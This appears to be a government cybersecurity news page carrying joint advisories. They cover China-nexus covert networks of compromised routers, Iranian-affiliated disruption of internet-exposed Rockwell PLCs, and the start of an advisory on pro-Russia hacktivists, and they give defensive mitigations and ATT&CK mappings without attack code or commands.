Normal view
Five Eyes Cyber Security Agencies Statement
CISA Offers Vital Resources as Venues Prepare for Key 2026 Events
Patch Smarter, Not Harder
NCSWIC releases additional content in its NCSWIC Video Series
CISA Highlights Vital Resources to Help Event Attendees Stay Safe
Preparing for the World Stage
Securing the American Experience
Defending Against China-Nexus Covert Networks of Compromised Devices
Defending against china-nexus covert networks of compromised devices
executive summary
Defending against China-nexus covert networks of compromised devices
Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it
Summary
With support from the UK Cyber League, this advisory has been jointly released by the National Cyber Security Centre (NCSC-UK) and international partners:
- Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC)
- Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)
- Germany Federal Office for the Protection of the Constitution - Bundesamt für Verfassungsschutz (BfV)
- Germany Federal Intelligence Service – Bundesnachrichtendienst (BND)
- Germany Federal Office for Information Security - Bundesamt für Sicherheit in der Informationstechnik (BSI)
- Japan National Cybersecurity Office (NCO) - 国家サイバー統括室
- Netherlands General Intelligence and Security Service - Algemene Inlichtingen- en Veiligheidsdienst (AIVD)
- Netherlands Defence Intelligence and Security Service - Militaire Inlichtingen- en Veiligheidsdienst (MIVD)
- New Zealand National Cyber Security Centre (NCSC-NZ)
- Spain National Cryptologic Centre – Centro Criptológico Nacional (CCN)
- Sweden National Cyber Security Centre - Nationellt cybersäkerhetscenter (NCSC-SE)
- United States Cybersecurity and Infrastructure Security Agency (CISA)
- United States Department of Defense Cyber Crime Center (DC3)
- United States Federal Bureau of Investigation (FBI)
- United States National Security Agency (NSA)
Its purpose is to provide network defenders with the tools needed to defend against China-nexus cyber actors and their tactic of using large scale networks of compromised devices (covert networks) to route their cyber activity.
Introduction
Over the past few years there has been a major shift in the tactics, techniques and procedures (TTPs) used by China-nexus cyber actors, moving away from the use of individually procured infrastructure, and towards the use of externally provisioned, large-scale networks of compromised devices.
The NCSC believes that the majority of China-nexus threat actors are using these networks (hereafter “covert networks”), that multiple covert networks have been created and are being constantly updated, and that a single covert network could be being used by multiple actors. These networks are mainly made up of compromised Small Office Home Office (SOHO) routers, as well as Internet of Things (IoT) and smart devices.
Anyone who is a target of China-nexus cyber actors may be impacted by the use of covert networks. They have been used by Chinese state-sponsored actors Volt Typhoon to pre-position offensive cyber capabilities on critical national infrastructure. The group Flax Typhoon used a different covert network of compromised infrastructure to conduct cyber espionage.
The use of covert networks of compromised devices - also known as botnets - to facilitate malicious cyber activity is not new, but China-nexus cyber actors are now using them strategically, and at scale.
This advisory describes the typical makeup of a covert network and what they are being used for. It also includes protective advice for organizations being targeted by cyber activity using a covert network as an access vector.
Covert Networks
Covert networks are used to connect across the internet in a low-cost, low-risk, deniable way, disguising the origin and attribution of malicious activity. Actors have been observed using them for each phase of their Cyber Kill Chains, from performing scans as part of reconnaissance, to the delivery of malware, communicating with said malware, and exfiltrating stolen data from a victim. They can also be used for general deniable internet browsing, allowing threat actors to research exploitation techniques, new TTPs, and their victims without attribution. Some covert networks are also used by legitimate customers to browse the internet, making it challenging to attribute malicious activity.
There is evidence that covert networks used by China-nexus actors are created and maintained by Chinese information security companies. A network known to network defenders as Raptor Train, which in 2024 infected more than 200,000 devices worldwide, was controlled and managed by the Chinese company, Integrity Technology Group. This company was also assessed by the FBI to be responsible for the computer intrusion activities attributed to China-based hackers known as Flax Typhoon.
Botnet operations represent a significant threat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyber attacks – NCSC Director of Operations, Paul Chichester
Covert networks mostly consist of compromised SOHO routers, but they also pull in any vulnerable device they can exploit at scale. Raptor Train was made up of thousands of SOHO routers and IoT devices, such as web cameras and video recorders, as well as firewalls and Network Attached Storage (NAS) devices. The KV Botnet used by Volt Typhoon was mainly made up of vulnerable Cisco and NetGear routers. The edge devices were vulnerable because they were “end of life” – out of date and no longer receiving updates or security patches by their manufacturers.
The cyber security industry has been aware of examples of these networks for some time and has publicly reported on the widespread scale of the threat and its implications. Mandiant Intelligence produced a public blog in May 2024 talking about covert networks in which they highlighted a key issue for defenders – indicator of compromise (IOC) Extinction. If a particular threat group could now come from one of many covert networks, each with potentially hundreds of thousands of endpoints, and each used by multiple threat actors, old network defense paradigms of static malicious IP block lists will be less effective. This is compounded by the dynamic nature of these networks where new nodes will be added as old devices are patched or removed from use.
Typical Network Topology
The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed. The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network.
Because of this, a description of all known covert networks in detail, including how they are constructed and how they communicate, would immediately be out of date – and for most network defenders would not be practically useful.
However, most covert networks of compromised devices use the same basic set up. Understanding this generalized structure can aid researchers and defenders by helping them to understand which part of a network they may have found, and how to defend against it.
The diagram above illustrates the basic setup of a covert network, where typically an actor will connect to the network via an on-ramp or entry node. Their traffic will be forwarded through multiple compromised devices, used as traversal nodes, before exiting the network from an exit node, usually in the same geographic region as the target.
Protective Advice
Defending from attackers using covert networks is not straightforward, and defensive tactics will be different based on the levels of resource and the nature of the target organization. General advice for good cyber security practice should be followed, and some key messages can be found in the appendix of this advisory.
The following advice is specifically tailored to steps which can be taken to combat the risk of attacks coming from large, dynamic networks of compromised devices.
Further guidance for all organizations facing cyber security threats is available on the NCSC website.
This guidance should be considered alongside all applicable laws and regulations of the UK and co-sealing countries relating to the security of networks and data. It will be each organization’s responsibility to ensure compliance with any such laws and regulations. Organizations should note that following the recommended actions set out below will not remove all risks.
All organizations
The NCSC recommends the following steps for all affected organizations to either take themselves, or ask their managed service and/or security providers to investigate for them:
- Map and understand network edge devices, developing a clear understanding of organizational assets and what should be connecting to them.
- Baseline normal connections, especially to corporate virtual private networks (VPNs) or other similar services.
- Would you expect connections from consumer broadband ranges?
- Leverage available dynamic threat feeds which include covert network infrastructure.
- Implement multifactor authentication for remote connections.
Smaller organizations should consider creating and actioning a free NCSC Cyber Action Toolkit.
Larger or more at-risk organizations
Some more comprehensive measures may be appropriate if the risk to an organization is high enough, to be conducted either in-house or through a security provider:
- Apply IP address allow lists rather than deny lists for connections to corporate VPNs for remote workers.
- Use geographic allow lists or profile incoming connections based on operating system, time zones, and/or organization specific system configuration settings.
- Implement zero trust policies for connections.
- Enforce machine certificates for Secure Sockets Layer (SSL) connections.
- Reduce the internet-facing presence of the IT estate.
- Investigate machine learning techniques to profile normal network edge activity to detect and block anomalies.
The NCSC's Cyber Essentials can help protect organizations of all sizes.
Largest or most at-risk organizations
If Advanced Persistent Threat (APT) tracking is part of an organization’s in-house capability, or if it is part of the service provided by a security vendor, consider tracking China-nexus covert networks as APTs in their own right.
- Active hunting – look for connections from IP addresses likely to be part of a covert network of compromised devices, for instance those hosting SOHO routers or IoT devices.
- Track and map covert networks reported by industry or government by looking at banners and certificates.
- Use threat reporting and threat feeds to create and implement dynamic blocklists and create alert rules to detect incoming threats.
- Consider using NetFlow feeds to look upstream and map covert networks to find new nodes.
The NCSC Cyber Assessment Framework provides guidance for organizations under the highest levels of threat, including those operating essential services, in sectors such as energy, healthcare, transport, digital infrastructure and government.
MITRE ATT&CK®
This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
|
Tactic |
ID |
Technique |
Procedure |
|---|---|---|---|
|
Resource Development |
Compromise Infrastructure: Botnet |
Botnets are used as core components of covert networks |
|
|
Resource Development |
Compromise Infrastructure: Network Devices |
Devices are compromised and added to botnets |
|
|
Resource Development |
Acquire Infrastructure: Virtual Private Server |
Virtual private servers (VPS) are used in covert networks, typically as on-ramps |
|
|
Command and Control |
Proxy: Multi-hop Proxy |
Used by China-nexus cyber actors to route traffic |
Appendix: Cyber Security Best Practices
In addition to the protective advice outlined in this advisory, a number of cyber security best practices will also be useful in defending against the activity described in this advisory.
- Protect your devices and networks by keeping them up to date: use the latest supported versions, apply security updates promptly, use antivirus and scan regularly to guard against known malware threats. See NCSC Guidance: https://www.ncsc.gov.uk/collection/device-security-guidance/policies-and-settings/antivirus-and-other-security-software
- Prevent and detect lateral movement in your organization’s networks. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement
- Implement architectural controls for network segregation. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/10-steps-network-security
- Set up a security monitoring capability so you are collecting the data that will be needed to analyze network intrusions. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes and https://www.ncsc.gov.uk/information/logging-made-easy
- Use modern systems and software. These have better security built-in. If you cannot move off out-of-date platforms and applications straight away, there are short term steps you can take to improve your position. See NCSC Guidance: https://www.ncsc.gov.uk/collection/mobile-device-guidance/managing-the-risks-from-obsolete-products
- Restrict intruders' ability to move freely around your systems and networks. Pay particular attention to potentially vulnerable entry points such as third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement and https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security.
- Deploy a host-based intrusion detection system. A variety of products are available, free and paid-for, to suit different needs and budgets.
- Further information: Invest in preventing malware-based attacks across various scenarios. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks
Disclaimer
This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by co-sealers. UK readers should refer to the NCSC website for information about NCSC assured services.
This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.
Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk.
All material is UK Crown Copyright ©
-
CISA Alerts
- Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure
Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure
Advisory at a Glance
| Title | Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure |
|---|---|
| Original Publication | April 7, 2026 |
| Executive Summary |
Iran-affiliated advanced persistent threat (APT) actors are conducting exploitation activity targeting internet-facing operational technology (OT) devices, including programmable logic controllers (PLCs) manufactured by Rockwell Automation/Allen-Bradley. This activity has led to PLC disruptions across several U.S. critical infrastructure sectors through malicious interactions with the project file and manipulation of data on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays, resulting in operational disruption and financial loss. U.S. organizations should urgently review the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the Mitigations section of this advisory to reduce the risk of compromise. |
| Affected Products |
|
| Key Actions |
|
| Indicators of Compromise |
For a downloadable copy of IOCs, see:
|
| Intended Audience |
Organizations: Critical Infrastructure Sectors: Government Services and Facilities, Water and Wastewater Systems (WWS), and Energy Roles: Defensive cybersecurity analysts, OT cybersecurity engineers, cybersecurity architects, secure systems developer |
Introduction
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), Department of Energy (DOE), and United States Cyber Command – Cyber National Mission Force (CNMF), hereafter referred to as the “authoring agencies,” are urgently warning U.S. organizations of ongoing cyber exploitation of internet-connected operational technology (OT) devices, including Rockwell Automation/Allen-Bradley-manufactured programmable logic controllers (PLCs), across multiple U.S. critical infrastructure sectors. As a result of this activity, organizations from multiple U.S. critical infrastructure sectors experienced disruptions through malicious interactions with the project files1 and the manipulation of data displayed on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays. In a few cases, this activity has resulted in operational disruption and financial loss.
Due to the widespread use of these PLCs and the potential for additional targeting of other branded OT devices across critical infrastructure, the authoring agencies recommend U.S. organizations urgently review the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the Mitigations section to reduce the risk of compromise.
The authoring agencies assess a group of Iranian-affiliated advanced persistent threat (APT) actors is conducting this activity to cause disruptive effects within the United States. The group has targeted devices spanning multiple U.S. critical infrastructure sectors, including Government Services and Facilities (to include local municipalities), Water and Wastewater Systems (WWS), and Energy Sectors. The authoring agencies previously reported on similar activity targeting PLCs by CyberAv3ngers (aka Shahid Kaveh Group)—a cyber threat actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC) Cyber Electronic Command (CEC).
If owners and operators discover an affected internet-accessible device in their environment, additional technical measures may be necessary to evaluate the risk of compromise. Please contact the authoring agencies and applicable vendors through existing support channels available to customers and integrators (see Contact Information) to receive support, mitigation, and investigation assistance, and engage your cyber incident response plans.
In addition to contacting the authoring agencies, organizations with Rockwell Automation/Allen-Bradley-manufactured PLCs should review the manufacturer’s previously issued guidance to strengthen the security of their operational technology deployments: PN1550 | CVE-2021-22681: Authentication Bypass Vulnerability Found in Logix Controllers, published in 2021, and SD1771 | Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet and Harden PLCs to Protect from Cyber Threats, published in 2026. Contact the Rockwell Automation Product Security Incident Response Team (PSIRT) at PSIRT@rockwellautomation.com for questions regarding this guidance, or to report cyber incidents related to Rockwell Automation products.
For more information on Iranian malicious cyber activity, see CISA’s Iran Threat Overview and Advisories webpage and the FBI’s Iran Threat webpage.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Background Information
Similar Historical Activity Targeting Programmable Logic Controllers
During a similar campaign beginning in November 2023, the IRGC CEC-affiliated cyber threat actors known as "CyberAv3ngers” targeted U.S.-based PLCs and HMIs, causing disruptive effects. Private industry and open sources also refer to this group as Hydro Kitten, Storm-0784, APT Iran, Bauxite, Mr. Soul, Soldiers of Solomon, UNC5691, and the Shahid Kaveh Group. These attacks compromised at least 75 devices, targeting U.S.-based Unitronics PLC devices with an HMI used across multiple critical infrastructure sectors, including WWS. For more information on this group’s activity, see the authoring agencies’ Joint Cybersecurity Advisory IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities.
Ongoing Threat Actor Activity Against U.S.-Based Programmable Logic Controllers
The FBI assesses a group of Iranian-affiliated APT actors are targeting internet-exposed PLCs with the intent to cause disruptions—including maliciously interacting with project files, and manipulating data displayed on HMI and SCADA displays—to U.S. critical infrastructure organizations. Iranian-affiliated APT targeting campaigns against U.S. organizations have recently escalated, likely in response to hostilities between Iran, and the United States and Israel.
Since at least March 2026, the authoring agencies identified (through engagements with victim organizations) an Iranian-affiliated APT-group that disrupted the function of PLCs. These PLCs were deployed across multiple U.S. critical infrastructure sectors (including Government Services and Facilities, WWS, and Energy sectors) within a wide variety of industrial automation processes. Some of the victims experienced operational disruption and financial loss.
Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See the MITRE ATT&CK Tactics and Techniques section of this advisory for tables of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
Initial Access
The authoring agencies observed Iranian-affiliated APT actors using several overseas-based IP addresses to access internet-facing Rockwell Automation/Allen-Bradley-manufactured PLCs [T0883]. The actors used leased, third-party hosted infrastructure with configuration software, such as Rockwell Automation’s Studio 5000 Logix Designer software, to create an accepted connection to the victim’s PLC. Targeted devices include CompactLogix and Micro850 PLC devices.
Command and Control
Inbound malicious traffic may be directed to devices on any of following ports: 44818, 2222, 102, 22, or 502. The targeting of ports [T0885] associated with other OT vendors’ protocols suggests these actors may also be targeting devices manufactured by companies other than Rockwell Automation/Allen-Bradley, including the Siemens S7 PLC. Additionally, the actors deployed Dropbear Secure Shell (SSH) software on victim endpoints to enable them to gain remote access through port 22 [T1219].
Impact
The FBI identified that this activity resulted in the extraction of the device’s project file and data manipulation on HMI and SCADA displays [T1565].
Indicators of Compromise
See Table 1 for recent IP addresses used by the Iranian-affiliated APT actors to communicate with Rockwell Automation/Allen-Bradley-manufactured devices (and potentially other branded OT devices) in the United States.
Disclaimer: The FBI observed that the threat actors used the IP addresses listed below in the specified time frames. This data is being provided for customers to query against logs for indications of historical targeting by the Iranian-affiliated APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.
MITRE ATT&CK Tactics and Techniques
See Table 2 to Table 4 for all referenced threat actor tactics and techniques in this advisory. The authoring agencies recommend organizations review historical TTPs for similar Iranian-affiliated cyber actor activity in IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
| Technique Title | ID | Use |
|---|---|---|
| Internet Accessible Device | T0883 | The actors used Rockwell Automation’s programming software (such as Studio 5000 Logix Designer) to access and interact with publicly exposed, internet-accessible PLCs installed and deployed without sufficient network and/or hardening security controls. |
| Technique Title | ID | Use |
|---|---|---|
| Stored Data Manipulation | T1565 | The actors maliciously interacted with project files and altered data displayed on HMI and SCADA displays |
| Technique Title | ID | Use |
|---|---|---|
| Commonly Used Port | T0885 | The actors used commonly used OT ports to communicate with PLCs. |
| Remote Access Tools | T1219 | The actors deployed Dropbear SSH software on victim endpoints to enable them to gain remote access through port 22. |
Mitigations
The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals 2.0 (CPGs 2.0) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPG 2.0 webpage for more information on the CPGs, including additional recommended baseline protections.
Network Defenders
The cyber threat actors accessed Rockwell Automation/Allen-Bradley-manufactured PLCs to cause disruptions to victim systems. To safeguard against this threat and threats to other types of PLCs, the authoring agencies urge organizations to consider the following mitigations.
In addition, organizations with these PLCs should view Rockwell Automation’s guidance: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet and Harden PLCs to Protect from Cyber Threats.
Immediate steps to prevent the attack:
- Disconnect the PLC from the public-facing internet [CPG 3.S]. Follow the joint guidance Secure connectivity principles for OT to safely allow remote access. Specifically, “remove inbound port exposure,” so the OT system is never directly exposed to the internet or external networks, and to ensure all access is mediated, monitored, and controlled. Do this through a secure gateway (jump host) that brokers the connection.
- Ensure cellular modems, used for remote field connectivity and access, are secured with strong authentication and updated.
- Enable logs for the connected modems to detect intrusion and improve incident response speed.
- For controllers with a physical mode switch, place the physical mode switch into run position to prevent remote modification. Devices should only be in the program or remote position when updating or downloading software online and immediately switched back to the run position when complete. (See Rockwell’s2 System Security Design Guidelines for manufacturer’s instructions.)
- For devices that allow for software key switching, enable programming protection in PLC configuration software (S7 Totally Integrated Automation [TIA] Portal) to limit who can modify PLCs remotely. (See Siemens’ Cybersecurity for Industry Operational Guidelines for the manufacturer’s instructions.)
- Create and test strong backups of the logic and configurations of PLCs. Store backup files offline and secure the physical removal media to enable fast recovery.
Follow-up steps to strengthen security posture:
- Implement multifactor authentication (MFA) [CPG 3.F] for access to the OT network from an external network.
- If remote access is required, implement a network proxy, gateway, firewall, and/or virtual private network (VPN) in front of the PLC to control network access.
- A VPN or gateway device can enable MFA for remote access even if the PLC does not support MFA. Implement security rules on these higher-level network security mechanisms that prevent the type of repeated and sustained login attempts that would be seen during a brute force attack. When possible, implement a device control list for workstations sending messages or connecting to OT components.
- Use the device control list to monitor for logon activity for unexpected or unusual access to devices from the internet.
- Keep PLC devices updated with the latest software patches by the manufacturer. Use established downtime windows to install patches. Known Exploited Vulnerabilities may need to be prioritized outside a downtime window.
- Configure external and internal firewalls to block traffic using common ports associated with network protocols that are unnecessary for the particular network segment.
- Disable any unused authentication methods, logic, or features, such as default authentication keys, as well as unused or needed services such as Teletype Network (Telnet), File Transfer Protocol (FTP), Remote Desktop Protocol (RDP), Virtual Network Computing (VNC), and web services.
- Monitor asset management systems for device configuration changes, which can be used to understand expected parameter settings.
- Monitor the content of network traffic for the following:
- Unusual logins to internet-connected devices or unexpected protocols to/from the internet.
- Functions of industrial control systems (ICS) management protocols that change an asset’s operating mode or modify programs.
In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, as well as reduce the impact and risk of compromise by cyber threat actors:
- Reduce risk exposure. CISA offers a range of services at no cost, including scanning and testing, to help organizations reduce exposure to threats via mitigating attack vectors. CISA’s Cyber Hygiene Services can help provide additional review of organizations’ internet accessible assets.
Device Manufacturers
Note: The following guidance is general in nature and not specific to any OT vendor. Some of the features, settings, and practices may already be offered by certain vendors. The inclusion of this guidance should not be interpreted as an assertion that vendors referenced in this product do not offer such security features.
Although critical infrastructure organizations using PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products that are secure by design and default. The authoring agencies urge device manufacturers to take ownership of their customers’ security outcomes by following the principles in the joint guide Secure by Demand: Priority Considerations for OT Owners and Operators when Selecting Digital Products, primarily:
- Change the manufacturers’ default settings to prevent exposing administrative interfaces to the internet.
- Do not charge additional fees for basic security features needed to operate the product securely.
- Support MFA, including via phishing-resistant methods.
By using secure by design tactics, software manufacturers can make product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.
For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.
Validate Security Controls
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
- Select an ATT&CK technique described in this advisory (see Table 2 to Table 4).
- Align your security technologies against the technique.
- Test your technologies against the technique.
- Analyze your detection and prevention technologies’ performance.
- Repeat the process for all security technologies to obtain a set of comprehensive performance data.
- Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Resources
- Authoring Agencies: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities
- CISA: Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers
- EPA: Cybersecurity for the Water Sector
- CISA: Water and Wastewater Systems Sector
- CISA Alert: Exploitation of Unitronics PLCs used in Water and Wastewater Systems
- CISA: Iran Threat Overview and Advisories
- FBI: The Iran Threat
- CISA, MITRE: Best Practices for MITRE ATT&CK Mapping
- CISA: Decider Tool
- CISA: Cross-Sector Cybersecurity Performance Goals 2.0
- CISA: No-Cost Cybersecurity Services and Tools
- CISA: Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products
- NSA, CISA: NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations
- CISA: Secure by Design
- FBI: Primary Mitigations to Reduce Cyber Threats to Operational Technology
- United Kingdom National Cyber Security Center: Secure connectivity principles for operational technology (OT)
Contact Information
U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:
- Contact CISA via CISA’s 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-Say-CISA (1-844-729-2472) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
- For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.
- Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact EnergySRMA@hq.doe.gov.
- Contact the Rockwell Automation PSIRT for questions regarding their guidance or for reporting cyber incidents related to Rockwell Automation at PSIRT@rockwellautomation.com.
Disclaimer
The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.
Version History
April 7, 2026: Initial version.
Notes
1Project file refers to the software file that contains ladder logic and configuration settings. On Rockwell Automation devices, it is referred to as an .ACD file.
2 See CompactLogix 5370 Controllers (Chapter 5: "Select the Operating Mode of the Controller") for more information on functions available for the switch.
-
CISA Blog
- The End is Just the Beginning of Better Security: Enhanced Vulnerability Management with OpenEoX
The End is Just the Beginning of Better Security: Enhanced Vulnerability Management with OpenEoX
Super Bowl LX: Strengthening Preparation, Building Resilience, Fostering Partnerships
-
CISA Alerts
- Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure
Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure
Summary
Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.
FBI, CISA, National Security Agency (NSA), and the following partners—hereafter referred to as “the authoring organizations”—are releasing this joint advisory on the targeting of critical infrastructure by pro-Russia hacktivists:
- U.S. Department of Energy (DOE)
- U.S. Environmental Protection Agency (EPA)
- U.S. Department of Defense Cyber Crime Center (DC3)
- Europol European Cybercrime Centre (EC3)
- EUROJUST – European Union Agency for Criminal Justice Cooperation
- Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
- Canadian Centre for Cyber Security (Cyber Centre)
- Canadian Security Intelligence Service (CSIS)
- Czech Republic Military Intelligence (VZ)
- Czech Republic National Cyber and Information Security Agency (NÚKIB)
- Czech Republic National Centre Against Terrorism, Extremism, and Cyber Crime (NCTEKK)
- French National Cybercrime Unit – Gendarmerie Nationale (UNC)
- French National Jurisdiction for the Fight Against Organized Crime (JUNALCO)
- German Federal Office for Information Security (BSI)
- Italian State Police (PS)
- Latvian State Police (VP)
- Lithuanian Criminal Police Bureau (LKPB)
- New Zealand National Cyber Security Centre (NCSC-NZ)
- Romanian National Police (PR)
- Spanish Civil Guard (GC)
- Spanish National Police (CNP)
- Swedish Polisen (SC3)
- United Kingdom National Cyber Security Centre (NCSC-UK)
The authoring organizations assess pro-Russia hacktivist groups are conducting less sophisticated, lower-impact attacks against critical infrastructure entities, compared to advanced persistent threat (APT) groups. These attacks use minimally secured, internet-facing virtual network computing (VNC) connections to infiltrate (or gain access to) OT control devices within critical infrastructure systems. Pro-Russia hacktivist groups—Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), Sector16, and affiliated groups—are capitalizing on the widespread prevalence of accessible VNC devices to execute attacks against critical infrastructure entities, resulting in varying degrees of impact, including physical damage. Targeted sectors include Water and Wastewater Systems, Food and Agriculture, and Energy.
The authoring organizations encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of pro-Russia hacktivist-related incidents. For additional information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Threat Overview and Advisories webpage.
Download the PDF version of this report:
Background and Development of Pro-Russia Hacktivist Groups
Over the past several years, the authoring organizations have observed pro-Russia hacktivist groups conducting cyber operations against numerous organizations and critical infrastructure sectors worldwide. The escalation of the Russia-Ukraine conflict in 2022 significantly increased the number of these pro-Russia groups. Consisting of individuals who support Russia’s agenda but lack direct governmental ties, most of these groups target Ukrainian and allied infrastructure. However, among the increasing number of groups, some appear to have associations with the Russian state through direct or indirect support.
Cyber Army of Russia Reborn
The authoring organizations assess that the Russian General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455—tracked in the cybersecurity community under several names (see Appendix B: Additional Designators Used for Cited Groups)—is likely responsible for supporting the creation of CARR —also known as “The People’s Cyber Army of Russia”—in late February or early March of 2022. Actors suspected to be from GRU unit 74455 likely funded the tools CARR threat actors used to conduct distributed denial-of-service (DDoS) attacks through at least September 2024.
In April 2022, the group began using a new Telegram channel featuring the name “CyberArmyofRussia_Reborn” to organize and plan group actions. The channel creators recruited actors to use CARR as an unattributable platform for conducting cyber activities beneath the level of an APT, aimed at deterring anti-Russia rhetoric. CARR threat actors presented themselves as a group of pro-Russia hacktivists supporting Russia’s stance on the Ukrainian conflict, and they soon began claiming responsibility for DDoS attacks against the U.S. and Europe for supporting Ukraine.
CARR documented these actions through embellished images and videos shared on their social media channels, promoting Russian ideology, disseminating talking points, and publicizing leaked information from hacks attributed to Russian state threat actors.
In late 2023, CARR expanded their operations to include attacks on industrial control systems (ICS), claiming an intrusion against a European wastewater treatment facility in October 2023. In November 2023, CARR targeted human-machine interface (HMI) devices, claiming intrusions at two U.S. dairy farms.
The authoring organizations assess that by late September 2024, CARR channel administrators became dissatisfied with the level of support and funding provided by the GRU. This dissatisfaction led CARR administrators and an administrator from another hacktivist group, NoName057(16), to create the Z-Pentest group, employing the same tactics, techniques, and procedures (TTPs) as CARR but separate from GRU involvement.
NoName057(16)
The authoring organizations assess that the Center for the Study and Network Monitoring of the Youth Environment (CISM), established on behalf of the Kremlin, created NoName057(16) as a covert project within the organization. Senior executives and employees within CISM developed and customized the NoName057(16) proprietary DDoS tool DDoSia, paid for the group’s network infrastructure, served as administrators on NoName057(16) Telegram channels, and selected DDoS targets.
